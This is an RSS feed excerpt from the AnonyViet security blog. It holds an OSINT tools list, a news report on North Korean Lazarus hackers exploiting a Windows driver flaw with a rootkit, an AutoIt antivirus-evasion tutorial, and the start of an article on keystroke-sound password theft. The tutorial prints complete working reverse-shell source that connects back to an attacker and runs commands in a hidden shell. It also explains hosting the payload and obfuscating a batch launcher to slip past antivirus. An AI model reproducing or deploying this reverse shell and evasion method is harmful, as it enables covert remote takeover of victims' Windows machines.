<h3 id="ftoc-wayback-machine" class="ftwp-heading">Wayback Machine</h3>
<p>Where are the old dead websites now? <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Farchive.org%2Fweb%2F" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Wayback Machine</a> is a search engine of over 632 billion websites and growing, many originating in the 1990s.</p>
<p>Archive.org is using the Wayback Machine to archive as much of the web as possible.  You can also use their website to manually host websites that are currently online.  If and when websites and web servers are deleted or taken offline, an archived copy can be found through the Wayback Machine.</p>
<p>I personally found websites archived from 1994 to 2021 through this tool.  And what&#39;s really cool is that you can often use links in archived sites to go to the archives of those other sites.</p>
<h3 id="ftoc-theharvester" class="ftwp-heading">theHarvester</h3>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2Flaramies%2FtheHarvester" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">theHarvester</a> is another useful open source spy tool that you can install from GitHub.  It can be used to get email addresses, servers, subdomains, employee names, and open internet ports from various public sources such as search engines, PGP key servers, and Shodan.</p>
<p>Once Harvester is installed, you can easily run the application from your command line.  There is a particularly rich set of options for exploring data in DNS servers.  DNS servers have all kinds of information that is very useful because they associate domain names with specific IP addresses.</p>
<p>Some of my favorite data sources you can explore with Harvester include LinkedIn, Bing, Google, and VirusTotal.</p>
<h3 id="ftoc-tineye" class="ftwp-heading">TinEye</h3>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Ftineye.com%2F" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">TinEye</a> is a powerful tool for online image research.  If you have an image on your local device, you can upload it to TinEye and see if and how the image is used on other websites.</p>
<p>The most obvious use case is if you have a photo of someone whose identity you don&#39;t know and you want to find out who they are.  But there are many other use cases, such as “where was this photo taken?”  or “what app is this a screenshot of?”</p>
<p>Conversely, if you have the URL of the image on the web, you can conduct research that way as well.</p>
<p>TinEye is also useful for maintaining your privacy.  For example, perhaps you should protect your child&#39;s privacy.  TinEye can notify you if and when your child&#39;s photos are shared online.</p>
<h3 id="ftoc-osint-framework" class="ftwp-heading">OSINT Framework</h3>
<p>The OSINT Framework is the perfect web application if you&#39;re not sure which OSINT data source you&#39;ll need to use to find the information you want.  So the OSINT Framework presents you with a giant tree of potential data sources that you can explore.</p>
<p>Do you want to analyze malicious files, usernames, geolocations, IP addresses, domains, IRC, Dark Web, metadata, threat intelligence, phone numbers or maybe something else? other?  Keep clicking through the chart tree until you find the source you need.</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-40743 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/04/ROZ1ZVDvvotplDAczU7SvPcmjKqa7bqj.jpg" alt="10 OSINT tools that hackers need to know 13" width="1084" height="598" title="10 OSINT tools that hackers need to know 20" srcset="https://anonyviet.com/wp-content/uploads/2022/04/ROZ1ZVDvvotplDAczU7SvPcmjKqa7bqj.jpg 1084w, https://anonyviet.com/wp-content/uploads/2022/04/ROZ1ZVDvvotplDAczU7SvPcmjKqa7bqj-300x165.jpg 300w, https://anonyviet.com/wp-content/uploads/2022/04/ROZ1ZVDvvotplDAczU7SvPcmjKqa7bqj-1024x565.jpg 1024w, https://anonyviet.com/wp-content/uploads/2022/04/ROZ1ZVDvvotplDAczU7SvPcmjKqa7bqj-768x424.jpg 768w, https://anonyviet.com/wp-content/uploads/2022/04/ROZ1ZVDvvotplDAczU7SvPcmjKqa7bqj-750x414.jpg 750w" sizes="auto, (max-width: 1084px) 100vw, 1084px"/></p>
<p>The OSINT Framework can be your first step in the entire OSINT process.</p>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/10-osint-tools-that-hackers-need-to-know/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2022/04/nCvGCqXf8CQUr7Vfm1aY61TZHJ8luL5P.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>North Korean hackers take advantage of Windows vulnerabilities to attack with Rootkits</title>
		<link>https://en.anonyviet.com/north-korean-hackers-take-advantage-of-windows-vulnerabilities-to-attack-with-rootkits/</link>
					<comments>https://en.anonyviet.com/north-korean-hackers-take-advantage-of-windows-vulnerabilities-to-attack-with-rootkits/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Sat, 02 Mar 2024 09:25:40 +0000</pubDate>
				<category><![CDATA[News]]></category>
		<category><![CDATA[advantage]]></category>
		<category><![CDATA[Attack]]></category>
		<category><![CDATA[hackers]]></category>
		<category><![CDATA[Korean]]></category>
		<category><![CDATA[North]]></category>
		<category><![CDATA[Rootkits]]></category>
		<category><![CDATA[Vulnerabilities]]></category>
		<category><![CDATA[Windows]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=14825</guid>

					<description><![CDATA[The notorious hacker group Lazarus from North Korea exploited a &#8220;zero-day&#8221; security vulnerability in the Windows operating system to escalate privileges to mistakenly attack users. This is part of their attack campaign using a rootkit called FudModule. This vulnerability, codenamed CVE-2024-21338, discovered by Avast during Lazarus attacks last year. The company created a test exploit [&#8230;]]]></description>
										<content:encoded><![CDATA[
<div class="markdown markdown-main-panel ui-v2-enabled" dir="ltr">
<p data-sourcepos="5:1-5:273">The notorious hacker group Lazarus from North Korea exploited a &#8220;zero-day&#8221; security vulnerability in the Windows operating system to escalate privileges to mistakenly attack users.  This is part of their attack campaign using a rootkit called <strong>FudModule</strong>.</p>
<p data-sourcepos="5:1-5:273"><img post-id="14825" fifu-featured="1" fetchpriority="high" decoding="async" class="aligncenter size-full wp-image-56668" src="https://anonyviet.com/wp-content/uploads/2024/03/hacker-Lazarus-Lazarus-.jpg" alt="North Korean hackers take advantage of Windows vulnerabilities to attack with Rootkits" title="North Korean hackers take advantage of Windows vulnerabilities to attack with Rootkits" width="552" height="385" title="North Korean hackers take advantage of Windows vulnerabilities to attack with Rootkit 2" srcset="https://anonyviet.com/wp-content/uploads/2024/03/hacker-Lazarus-Lazarus-.jpg 552w, https://anonyviet.com/wp-content/uploads/2024/03/hacker-Lazarus-Lazarus--300x209.jpg 300w" /></p>
<p data-sourcepos="7:1-7:217">This vulnerability, codenamed <strong>CVE-2024-21338</strong>, discovered by Avast during Lazarus attacks last year.  The company created a test exploit (PoC) and submitted a report to Microsoft in August 2023.</p>
<p data-sourcepos="9:1-9:335">Microsoft patched the vulnerability during its “Patch Tuesday” security update in February 2024. However, the initial announcement of CVE-2024-21338 did not mention that it had been exploited In reality.  On Wednesday, the tech giant updated its notification to warn customers that the exploit was still ongoing.</p>
<p data-sourcepos="11:1-11:355">Avast&#39;s blog post on Wednesday provided a detailed technical description of the vulnerability and how Lazarus exploited this CVE to distribute the rootkit.  The location of the attack is located in the &#39;appid.sys&#39; driver related to Microsoft&#39;s AppLocker security feature.  Instead of installing malicious drivers themselves (BYOVD), Hackers will target a driver available in many systems to avoid detection.</p>
<p><span style="color: #008000"><em><strong>Rootkits</strong> is a type of malware (<strong>malware. malware</strong>) is designed to hide its or other malware&#39;s existence in the computer system.  Rootkits penetrate deeply into the system with high-level access (root or administrator), allowing hackers to control the entire system without being detected.  Rootkits can cause many security problems, including stealing personal information, monitoring user activity, and installing additional malware.  Due to their high level of concealment, rootkits are difficult to detect and remove.</em></span></p>
<p data-sourcepos="13:1-13:329">Avast explains: &#8220;By exploiting such vulnerabilities, Hackers minimize saving or downloading other malicious drivers.&#8221;  This helps Hackers attack the system kernel (kernel) so they can bypass most detection mechanisms and even work on systems that apply driver control.</p>
<p data-sourcepos="15:1-15:287">Through CVE-2024-21338, hacker Lazarus has elevated User rights on the compromised system and created a direct read/write mechanism at the operating system kernel level.  This trick allows them to directly manipulate kernel objects in the updated version of the FudModule rootkit (appearing in 2022).</p>
<p data-sourcepos="17:1-17:180">The new rootkit version has improvements that increase stealth and disable security software AhnLab V3 Endpoint Security, Windows Defender, CrowdStrike Falcon and HitmanPro.</p>
<p data-sourcepos="19:1-19:128">The Lazarus campaign tracked by Avast also used a remote access trojan (<a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2F%3Fs%3Drat" rel="noopener">RAT</a>) new, detailed information will be announced by the company later.</p>
<p data-sourcepos="29:1-29:65">
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/north-korean-hackers-take-advantage-of-windows-vulnerabilities-to-attack-with-rootkits/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2024/03/hacker-Lazarus-Lazarus-.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>How Hackers Bypass AV Infiltrate Windows with Autoit</title>
		<link>https://en.anonyviet.com/how-hackers-bypass-av-infiltrate-windows-with-autoit/</link>
					<comments>https://en.anonyviet.com/how-hackers-bypass-av-infiltrate-windows-with-autoit/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Tue, 09 Jan 2024 08:30:55 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[AutoIT]]></category>
		<category><![CDATA[Bypass]]></category>
		<category><![CDATA[hackers]]></category>
		<category><![CDATA[Infiltrate]]></category>
		<category><![CDATA[Windows]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=14346</guid>

					<description><![CDATA[In the age of digital technology, when network security becomes increasingly important, grasping the knowledge of how to attack and defend is undeniable. The Autoit programming language is an easy to read and understand scripting language, often used to create automation scripts. However, in the hands of hackers, it can become a powerful malicious tool. [&#8230;]]]></description>
										<content:encoded><![CDATA[
<div id="ftwp-postcontent">
<p>In the age of digital technology, when network security becomes increasingly important, grasping the knowledge of how to attack and defend is undeniable.  The Autoit programming language is an easy to read and understand scripting language, often used to create automation scripts.  However, in the hands of hackers, it can become a powerful malicious tool.</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> belong to <span style="color: #008080;">AnonyViet</span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietoffical" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p>We will explore together how hackers create a Reverse Shell attack that can bypass conventional anti-virus measures and how Autoit can be exploited to accomplish this.  Let&#39;s explore together!</p>
<p><span style="color: #ff0000;"><strong>Note: This article is for educational, research and study purposes only.  Anonyviet will not take full responsibility for illegal acts!</strong></span></p>
<h2 id="ftoc-gioi-thieu-ngan-gon-ve-ngon-ngu-lap-trinh-autoit" class="ftwp-heading"><span style="font-size: 14pt; color: #0000ff;"><strong>A brief introduction to the Autoit programming language</strong></span></h2>
<p>AutoIt is a programming language for the Windows operating system, primarily used to automate tasks.  With simple syntax and strong integration with Windows, the AutoIt language is a flexible tool for automated scripting, from software installation to user interface interaction.  Known for its stability and high compatibility, the AutoIt programming language is a popular choice among Windows users and software developers.</p>
<h2 id="ftoc-cach-hacker-bypass-av-xam-nhap-windows-voi-autoit" class="ftwp-heading"><span style="color: #0000ff; font-size: 14pt;"><strong>How Hackers Bypass AV Infiltrate Windows with Autoit</strong></span></h2>
<p>Hackers penetrate our computers in many different ways.  But in this article, I will mention the Reverse Shell technique, which is a popular technique <span id="___color__suggestion" class="___color_suggestion">for</span> intrusion into network systems, places <span id="___color__suggestion" class="___color_suggestion">the</span> The compromised computer creates a connection <span id="___color__suggestion" class="___color_suggestion">with</span> computer <span id="___color__suggestion" class="___color_suggestion">target</span> of the attacker.  This allows attackers <span id="___color__suggestion" class="___color_suggestion">proceed</span> remote intrusion activities, <span id="___color__suggestion" class="___color_suggestion">include</span> <span id="___color__suggestion" class="___color_suggestion">setting</span> malicious code, <span id="___color__suggestion" class="___color_suggestion">steal</span> <span id="___color__suggestion" class="___color_suggestion">data</span>, <span id="___color__suggestion" class="___color_suggestion">Revision</span> system configuration etc. This technique <span id="___color__suggestion" class="___color_suggestion">primarily</span> used <span id="___color__suggestion" class="___color_suggestion">aim</span> <span id="___color__suggestion" class="___color_suggestion">exploit</span> <span id="___color__suggestion" class="___color_suggestion">degree</span> <span id="___color__suggestion" class="___color_suggestion">trust</span> of the system <span id="___color__suggestion" class="___color_suggestion">network</span> and create a window <span id="___color__suggestion" class="___color_suggestion">virtual</span> <span id="___color__suggestion" class="___color_suggestion">aim</span> <span id="___color__suggestion" class="___color_suggestion">perform</span> intrusion activities.</p>
<p>First of all, I will create a file called ReverseShell.au3 and the code starts by declaring the necessary libraries from AutoIt</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">#include &lt;AutoItConstants.au3&gt;&#13;
#include &lt;GUIConstantsEx.au3&gt;&#13;
#include &lt;MsgBoxConstants.au3&gt;</pre>
</p>
<p>Next, the IP address and port of the control server are set in global variables.  In this case, the hacker machine is located with IP address 127.0.0.1 (localhost) and port 4444</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">Global $host = "127.0.0.1"&#13;
Global $port = 4444</pre>
</p>
<p>Define a global variable to store the current path of the victim machine</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">Global $currentDir = @WorkingDir</pre>
</p>
<p>In an infinite loop, this code will check if the victim&#39;s machine is accessible to the hacker&#39;s machine, using the Ping function.  If the victim machine is accessible, it will try to connect to the hacker&#39;s computer via TCP protocol.  If the connection is successful, the loop exits.  And vice versa, if the connection fails, the code will continue to run until the connection is successful</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">While 1&#13;
    If Ping($host, 250) Then ; Check if the server is reachable&#13;
        TCPStartup()&#13;
        $socket = TCPConnect($host, $port)&#13;
        If $socket &lt;&gt; -1 Then ; Check if the connection is successful&#13;
            ExitLoop ; Exit the loop if the connection is established&#13;
        EndIf&#13;
        TCPCloseSocket($socket)&#13;
        TCPShutdown()&#13;
    EndIf&#13;
    Sleep(1000) ; Wait for 1 second before retrying&#13;
WEnd</pre>
</p>
<p>After the victim&#39;s computer connects to the hacker&#39;s computer, the victim&#39;s computer will send the current path to the hacker&#39;s computer</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">TCPSend($socket, $currentDir &amp; "&gt; ")</pre>
</p>
<p>Once connected, the victim&#39;s computer continues to listen to receive commands from the hacker&#39;s computer.  If the received command begins with “cd”, it executes a directory change command.  If not, it executes the command on the operating system and sends the results to the hacker&#39;s machine</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">While 1&#13;
    If @error Then ExitLoop&#13;
    $recv = TCPRecv($socket, 1024)&#13;
    If $recv &lt;&gt; "" Then&#13;
        If StringLeft($recv, 3) = "cd " Then ; Check if the command is a change directory command&#13;
            $dirToChange = StringTrimLeft($recv, 3)&#13;
            $dirToChange = StringStripWS($dirToChange, 3) ; Remove leading/trailing whitespaces&#13;
            If FileChangeDir($dirToChange) Then&#13;
                $currentDir = @WorkingDir&#13;
                TCPSend($socket, $currentDir &amp; "&gt; ")&#13;
            Else&#13;
                TCPSend($socket, "[!] Failed to change directory" &amp; @CRLF)&#13;
                TCPSend($socket, $currentDir &amp; "&gt; ")&#13;
            EndIf&#13;
        Else&#13;
            $cmd = Run(@ComSpec &amp; " /c " &amp; $recv, "", @SW_HIDE, 2)&#13;
            $stdout = ""&#13;
            While @ComSpec &amp; " /c " &amp; $recv &lt;&gt; ""&#13;
                $line = StdoutRead($cmd)&#13;
                If @error Then ExitLoop&#13;
                $stdout &amp;= $line&#13;
            WEnd&#13;
            $ret = TCPSend($socket, $stdout)&#13;
            TCPSend($socket, $currentDir &amp; "&gt; ")&#13;
            Sleep(500)&#13;
        EndIf&#13;
    EndIf&#13;
WEnd</pre>
</p>
<p>After the hacker completes his purpose, the AutoIt code will close the TCP connection and turn off the TCP library</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">TCPCloseSocket($socket)&#13;
TCPShutdown()</pre>
</p>
<p>Here is the entire code:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">#include &lt;AutoItConstants.au3&gt;&#13;
#include &lt;GUIConstantsEx.au3&gt;&#13;
#include &lt;MsgBoxConstants.au3&gt;&#13;
&#13;
Global $host = "127.0.0.1"&#13;
Global $port = 4444&#13;
&#13;
Global $currentDir = @WorkingDir&#13;
&#13;
While 1&#13;
    If Ping($host, 250) Then ; Check if the server is reachable&#13;
        TCPStartup()&#13;
        $socket = TCPConnect($host, $port)&#13;
        If $socket &lt;&gt; -1 Then ; Check if the connection is successful&#13;
            ExitLoop ; Exit the loop if the connection is established&#13;
        EndIf&#13;
        TCPCloseSocket($socket)&#13;
        TCPShutdown()&#13;
    EndIf&#13;
    Sleep(1000) ; Wait for 1 second before retrying&#13;
WEnd&#13;
&#13;
TCPSend($socket, $currentDir &amp; "&gt; ")&#13;
While 1&#13;
    If @error Then ExitLoop&#13;
    $recv = TCPRecv($socket, 1024)&#13;
    If $recv &lt;&gt; "" Then&#13;
        If StringLeft($recv, 3) = "cd " Then ; Check if the command is a change directory command&#13;
            $dirToChange = StringTrimLeft($recv, 3)&#13;
            $dirToChange = StringStripWS($dirToChange, 3) ; Remove leading/trailing whitespaces&#13;
            If FileChangeDir($dirToChange) Then&#13;
                $currentDir = @WorkingDir&#13;
                TCPSend($socket, $currentDir &amp; "&gt; ")&#13;
            Else&#13;
                TCPSend($socket, "[!] Failed to change directory" &amp; @CRLF&#13;
                TCPSend($socket, $currentDir &amp; "&gt; ")&#13;
            EndIf&#13;
        Else&#13;
            $cmd = Run(@ComSpec &amp; " /c " &amp; $recv, "", @SW_HIDE, 2)&#13;
            $stdout = ""&#13;
            While @ComSpec &amp; " /c " &amp; $recv &lt;&gt; ""&#13;
                $line = StdoutRead($cmd)&#13;
                If @error Then ExitLoop&#13;
                $stdout &amp;= $line&#13;
            WEnd&#13;
            $ret = TCPSend($socket, $stdout)&#13;
            TCPSend($socket, $currentDir &amp; "&gt; ")&#13;
            Sleep(500)&#13;
        EndIf&#13;
    EndIf&#13;
WEnd&#13;
&#13;
TCPCloseSocket($socket)&#13;
TCPShutdown()</pre>
</p>
<p>Next, the hacker will compile the ReverseShell.au3 script into ReverseShell.a3x</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-54356 size-full" src="https://anonyviet.com/wp-content/uploads/2024/01/Screenshot-22.png" alt="Bypass AV hackers infiltrate Windows with Autoit" width="586" height="412" title="How Hackers Bypass AV Infiltrate Windows with Autoit 10" srcset="https://anonyviet.com/wp-content/uploads/2024/01/Screenshot-22.png 586w, https://anonyviet.com/wp-content/uploads/2024/01/Screenshot-22-300x211.png 300w" sizes="auto, (max-width: 586px) 100vw, 586px"/></p>
</p>
<p>When the compilation process is completed, the hacker opens a web server to store the autoit.exe and ReverseShell.a3x files to prepare for the attack.  And here I have prepared a Batch script called RS.bat with the following content:</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-54357 size-full" src="https://anonyviet.com/wp-content/uploads/2024/01/Screenshot-23.png" alt="Bypass AV hackers infiltrate Windows with Autoit" width="670" height="171" title="How Hackers Bypass AV Infiltrate Windows with Autoit 11" srcset="https://anonyviet.com/wp-content/uploads/2024/01/Screenshot-23.png 670w, https://anonyviet.com/wp-content/uploads/2024/01/Screenshot-23-300x77.png 300w" sizes="auto, (max-width: 670px) 100vw, 670px"/></p>
<p>Now I will go to the website <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fwww.batch-obfuscator.tk%2F" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">https://www.batch-obfuscator.tk/</a> Encrypt this RS.bat file to bypass AntiVirus</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-54358 size-full" src="https://anonyviet.com/wp-content/uploads/2024/01/Screenshot-24.png" alt="How Hackers Bypass AV Infiltrate Windows with Autoit 6" width="1366" height="683" title="How Hackers Bypass AV Infiltrate Windows with Autoit 12" srcset="https://anonyviet.com/wp-content/uploads/2024/01/Screenshot-24.png 1366w, https://anonyviet.com/wp-content/uploads/2024/01/Screenshot-24-300x150.png 300w, https://anonyviet.com/wp-content/uploads/2024/01/Screenshot-24-1024x512.png 1024w, https://anonyviet.com/wp-content/uploads/2024/01/Screenshot-24-768x384.png 768w, https://anonyviet.com/wp-content/uploads/2024/01/Screenshot-24-360x180.png 360w, https://anonyviet.com/wp-content/uploads/2024/01/Screenshot-24-750x375.png 750w, https://anonyviet.com/wp-content/uploads/2024/01/Screenshot-24-1140x570.png 1140w" sizes="auto, (max-width: 1366px) 100vw, 1366px"/></p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-54359 size-full" src="https://anonyviet.com/wp-content/uploads/2024/01/Screenshot-25.png" alt="How Hackers Bypass AV Infiltrate Windows with Autoit 7" width="1011" height="506" title="How Hackers Bypass AV Infiltrate Windows with Autoit 13" srcset="https://anonyviet.com/wp-content/uploads/2024/01/Screenshot-25.png 1011w, https://anonyviet.com/wp-content/uploads/2024/01/Screenshot-25-300x150.png 300w, https://anonyviet.com/wp-content/uploads/2024/01/Screenshot-25-768x384.png 768w, https://anonyviet.com/wp-content/uploads/2024/01/Screenshot-25-360x180.png 360w, https://anonyviet.com/wp-content/uploads/2024/01/Screenshot-25-750x375.png 750w" sizes="auto, (max-width: 1011px) 100vw, 1011px"/></p>
</p>
<p>The following are Virustotal&#39;s scan results: <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fwww.virustotal.com%2Fgui%2Ffile%2Fe18726a16d26bd432fd422a6a34636d61cfea23fde3a79639bd0cabb548fbfee%3Fnocache%3D1" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">https://www.virustotal.com/gui/file/e18726a16d26bd432fd422a6a34636d61cfea23fde3a79639bd0cabb548fbfee?nocache=1</a></p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-54360 size-full" src="https://anonyviet.com/wp-content/uploads/2024/01/Screenshot-26.png" alt="Bypass Antivirus with Autoit" width="1326" height="682" title="How Hackers Bypass AV Infiltrate Windows with Autoit 14" srcset="https://anonyviet.com/wp-content/uploads/2024/01/Screenshot-26.png 1326w, https://anonyviet.com/wp-content/uploads/2024/01/Screenshot-26-300x154.png 300w, https://anonyviet.com/wp-content/uploads/2024/01/Screenshot-26-1024x527.png 1024w, https://anonyviet.com/wp-content/uploads/2024/01/Screenshot-26-768x395.png 768w, https://anonyviet.com/wp-content/uploads/2024/01/Screenshot-26-750x386.png 750w, https://anonyviet.com/wp-content/uploads/2024/01/Screenshot-26-1140x586.png 1140w" sizes="auto, (max-width: 1326px) 100vw, 1326px"/></p>
</p>
<p>Demo videos:</p>
<p><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" title="RS-Autoit" src="https://streamable.com/o/abl2cb#?secret=FF0rTdj8KJ" data-secret="FF0rTdj8KJ" frameborder="0" scrolling="no" width="1279" height="720"></iframe></p>
<p>Thus, by taking advantage of AutoIt&#39;s flexibility and customization, hackers can create malicious scripts that antivirus programs often cannot recognize.  Some methods that hackers often use are constantly changing malicious code to avoid detection, using encryption techniques or changing the structure of the code to avoid recognition by security software.  Along with taking advantage of system vulnerabilities and creativity in creating new intrusion techniques, hackers can create powerful intrusion tools that are difficult to detect and pose a danger to the public. systems.  From there, we need to always update and improve our security knowledge to protect ourselves as well as protect the digital environment.</p>
</p>
<p><em><strong>Read more: <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fminh-da-bypass-av-xam-nhap-windows-10-voi-metasploit-va-python-nhu-the-nao%2F" class="local-link" rel="noopener"><span style="color: #ff0000;">How do I Bypass AV into Windows 10 with Metasploit and Python?</span></a></strong></em></p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;54319&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;title&quot;:&quot;C\u00e1ch Hacker Bypass AV x\u00e2m nh\u1eadp Windows v\u1edbi Autoit&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>  The article scored: 5/5 &#8211; (100 votes)</p>
</div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/how-hackers-bypass-av-infiltrate-windows-with-autoit/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2024/01/Reverse_Shell_hu15e50c4afe9004de71c0eb059c8529ab_1162463_800x0_resize_box_2.png" medium="image"></media:content>
            	</item>
		<item>
		<title>Careful!  Keystroke sounds can reveal passwords to hackers</title>
		<link>https://en.anonyviet.com/careful-keystroke-sounds-can-reveal-passwords-to-hackers/</link>
					<comments>https://en.anonyviet.com/careful-keystroke-sounds-can-reveal-passwords-to-hackers/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Fri, 06 Oct 2023 08:25:01 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Careful]]></category>
		<category><![CDATA[hackers]]></category>
		<category><![CDATA[Keystroke]]></category>
		<category><![CDATA[Passwords]]></category>
		<category><![CDATA[reveal]]></category>
		<category><![CDATA[sounds]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=13368</guid>

					<description><![CDATA[Do you know that Keystroke sounds can reveal passwords to hackers Are not? This is a serious problem that any network user needs to pay attention to. In this article, AnonyViet will explain to you how hackers use AI to analyze the sound from the keyboard and give recommendations so you can protect your password. [&#8230;]]]></description>
										<content:encoded><![CDATA[
<div id="ftwp-postcontent">
<p>Do you know that <strong>Keystroke sounds can reveal passwords to hackers</strong> Are not?  This is a serious problem that any network user needs to pay attention to.  In this article, AnonyViet will explain to you how hackers use AI to analyze the sound from the keyboard and give recommendations so you can protect your password.  Let&#8217;s follow along!</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> belong to <span style="color: #008080;">AnonyViet</span> ???? <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  ????</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<h2 id="ftoc-vi-sao-tieng-go-phim-co-the-tiet-lo-mat-khau-cho-hacker" class="ftwp-heading"><strong>Why can the sound of keystrokes reveal passwords to hackers?</strong></h2>
<p>You may think that your password is a safe secret that only you know.  But in reality it&#8217;s not really like that.  A recent study by a team of experts at Cornell University (USA) revealed an AI-controlled attack that can steal users&#8217; passwords with up to 95% accuracy just by listening. sound from the keyboard.</p>
<figure id="attachment_49879" aria-describedby="caption-attachment-49879" style="width: 800px" class="wp-caption aligncenter"><img decoding="async" fetchpriority="high" class="wp-image-49879 size-full" src="https://anonyviet.com/wp-content/uploads/2023/08/tieng-go-phim-co-the-tiet-lo-mat-khau-cho-hacker-1.jpg" alt="Keystroke sounds can reveal passwords to hackers" width="800" height="495" srcset="https://anonyviet.com/wp-content/uploads/2023/08/tieng-go-phim-co-the-tiet-lo-mat-khau-cho-hacker-1.jpg 800w, https://anonyviet.com/wp-content/uploads/2023/08/tieng-go-phim-co-the-tiet-lo-mat-khau-cho-hacker-1-300x186.jpg 300w, https://anonyviet.com/wp-content/uploads/2023/08/tieng-go-phim-co-the-tiet-lo-mat-khau-cho-hacker-1-768x475.jpg 768w, https://anonyviet.com/wp-content/uploads/2023/08/tieng-go-phim-co-the-tiet-lo-mat-khau-cho-hacker-1-750x464.jpg 750w" sizes="(max-width: 800px) 100vw, 800px" title="Careful!  Keystroke sounds can reveal passwords to hackers 5"/><figcaption id="caption-attachment-49879" class="wp-caption-text">Can the sound of typing keys reveal passwords to hackers?</figcaption></figure>
<p>So how do hackers do this?  They use an AI system trained to recognize the audio characteristics of each keystroke, such as waveform, pitch, and timing.  From there, they can reconstruct what is typed, including passwords.</p>
<p>What is worrying is that hackers can carry out this attack remotely, through applications such as Zoom or Skype, without needing direct access to the victim&#8217;s computer.  The team tested it on Zoom meetings.  AI will analyze the audio as they type the corresponding message that appears in the chat.</p>
